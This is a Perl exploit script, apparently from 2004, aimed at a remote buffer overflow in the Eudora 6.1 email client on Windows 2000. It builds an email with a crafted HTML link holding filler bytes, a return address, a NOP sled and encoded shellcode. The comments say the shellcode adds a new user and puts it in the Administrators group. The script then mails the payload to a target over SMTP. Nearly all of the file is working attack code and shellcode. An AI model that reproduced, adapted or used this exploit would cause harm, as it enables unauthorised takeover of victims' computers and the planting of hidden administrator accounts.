#!/usr/bin/perl -w
###########################################################################
# Remote buffer overflow exploit for Eudora v6.1(6.0.3 and 5.2.1)
# NetUserAdd(X), NetLocalGroupAddMembers(X, Administrators) 
# Tested on 2k SP2 (Eudora v6.1.0.6)      
# by RusH Security Team [ http://rst.void.ru ]
# coded by f3sy1 [ f3syl[at]rsteam[dot]ru ]
# Advisory: http://www.packetstormsecurity.org/0405-exploits/eudoraURL.txt
###########################################################################
use Net::SMTP; 

$ret=0x77e2492b; #jmp esp : ntdll.dll (2k SP2)
$nop="\x90"x23;
$buff="A"x277;
                 # 330 byte shellcode (work only on NT platforms)
$shellcode = "\xeb\x0f\x5b\x80\x33\x99\x43\x81\x3b\x72\x35\x37\x2e\x75\xf4".
             "\x74\x05\xe8\xec\xff\xff\xff\xff\x18\x75\x19\x99\x10\x7f\x71".
             "\x2e\x99\x99\x99\x10\x9f\x10\x5a\xca\xf1\xe7\x41\x7b\xea\x71".
             "\x24\x99\x99\x99\x10\xdf\x95\xca\xf1\x17\xd7\x97\x75\x71\x36".
             "\x99\x99\x99\x10\xdf\x91\xa8\x42\xca\xf1\xe9\xf0\xaa\xab\xf1".
             "\xf7\xfc\xed\xf8\xcd\x66\x49\x10\xdf\x9d\x10\x5a\xca\xf1\xc7".
             "\x46\xe5\x54\x71\x15\x99\x99\x99\x10\xdf\x89\xca\xf1\x4e\xa4".
             "\x95\x5a\x71\xe7\x99\x99\x99\x10\xdf\x8d\xa8\x59\xa8\x42\xda".
             "\xc9\xf1\xeb\x99\xea\x99\xf1\xed\x99\xf6\x99\xf1\xeb\x99\xf8".
             "\x99\xf1\xea\x99\xed\x99\xf1\xf7\x99\xf0\x99\xf1\xf4\x99\xf0".
             "\x99\xf1\xd8\x99\xfd\x99\x10\xff\x85\xc9\xf1\xc1\x99\x99\x99".
             "\x10\x78\x10\xd7\x81\xf1\x99\x99\xc5\x99\xc9\xca\xc9\xc9\xca".
             "\xc9\xc8\xc8\x10\x78\xc9\xcd\xc8\xca\xc9\x66\xcf\x89\x12\xd7".
             "\x81\xd0\xd0\xc8\x10\x78\xf3\x98\xc8\xf3\x9a\x66\xef\x85\xf3".
             "\x99\x66\xcf\x8d\x66\xcf\x95\xcf\xf3\xa9\xc0\xfd\x12\x98\x12".
             "\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91\xc7\x5b\x9d\x99\xca\xcc".
             "\xcf\xce\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73".
             "\x12\xd3\x81\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98".
             "\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98".
             "\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff".
             "\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12\x98\x71\x72\x9b".
             "\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x72\x35\x37\x2e";

$pack_ret = pack('l', ($ret));

$message = '<x-html><a href="C:\\'.$buff.$pack_ret.$nop.$shellcode.'"> look to http://rst.void.ru</a></x-html>';

$smtp = Net::SMTP->new('smtp.mail.ru') || die "Can't connect to smtp server: $@\n";	
$smtp->mail('vasa@mail.ru'); # you e-mail
$smtp->to('lame@mail.ru');    # lame e-mail
$smtp->data();  	

print "Send exploit...\n";

$smtp->datasend("To: postmaster\n"); 	 	
$smtp->datasend("\n"); 		
$smtp->datasend("$message\n"); 	 	
$smtp->dataend(); 	 	
$smtp->quit;
sleep 2;

print "Complete\n";